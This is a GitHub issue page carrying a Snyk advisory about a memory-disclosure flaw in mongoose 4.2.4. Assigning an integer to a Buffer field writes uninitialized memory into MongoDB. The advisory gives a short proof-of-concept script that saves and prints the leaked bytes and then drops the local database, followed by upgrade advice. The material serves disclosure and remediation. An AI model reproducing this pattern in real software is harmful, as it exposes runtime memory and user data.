You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Snyk Description: ## Overview
A potential memory disclosure vulnerability exists in mongoose.
A Buffer field in a MongoDB document can be used to expose sensitive
information such as code, runtime memory and user data into MongoDB.
Details
Initializing a Buffer field in a document with integer N creates a Buffer
of length N with non zero-ed out memory. Example:
var x = new Buffer(100); // uninitialized Buffer of length 100
// vs
var x = new Buffer('100'); // initialized Buffer with value of '100'
Initializing a MongoDB document field in such manner will dump uninitialized
memory into MongoDB.
The patch wraps Buffer field initialization in mongoose by converting a number value N to array [N], initializing the Buffer with N in its
binary form.
Proof of concept
varmongoose=require('mongoose');mongoose.connect('mongodb://localhost/bufftest');// data: Buffer is not uncommon, taken straight from the docs: http://mongoosejs.com/docs/schematypes.htmlmongoose.model('Item',newmongoose.Schema({id: String,data: Buffer}));varItem=mongoose.model('Item');varsample=newItem();sample.id='item1';// This will create an uninitialized buffer of size 100sample.data=100;sample.save(function(){Item.findOne(function(err,result){// Print out the data (exposed memory)console.log(result.data.toString('ascii'))mongoose.connection.db.dropDatabase();// Clean up everythingprocess.exit();});});
Remediation
Upgrade mongoose to version >= 3.8.39 or >= 4.3.6.
If a direct dependency update is not possible, use snyk wizard to patch this vulnerability.
Package Name: mongoose
Package Version: ['4.2.4']
Package Manager: npm
Target File: package.json
Severity Level: medium
Snyk ID: npm:mongoose:20160116
Snyk CVE: No CVE
Snyk CWE: CWE-201
Link to issue in Snyk: https://app.snyk.io/org/rhicksiii91/project/93ddcac2-4d2c-43e7-b383-b47b30846d11
Snyk Description: ## Overview
A potential memory disclosure vulnerability exists in mongoose.
A
Bufferfield in a MongoDB document can be used to expose sensitiveinformation such as code, runtime memory and user data into MongoDB.
Details
Initializing a
Bufferfield in a document with integerNcreates aBufferof length
Nwith non zero-ed out memory.Example:
Initializing a MongoDB document field in such manner will dump uninitialized
memory into MongoDB.
The patch wraps
Bufferfield initialization in mongoose by converting anumbervalueNto array[N], initializing theBufferwithNin itsbinary form.
Proof of concept
Remediation
Upgrade
mongooseto version >= 3.8.39 or >= 4.3.6.If a direct dependency update is not possible, use
snyk wizardto patch this vulnerability.References
The text was updated successfully, but these errors were encountered: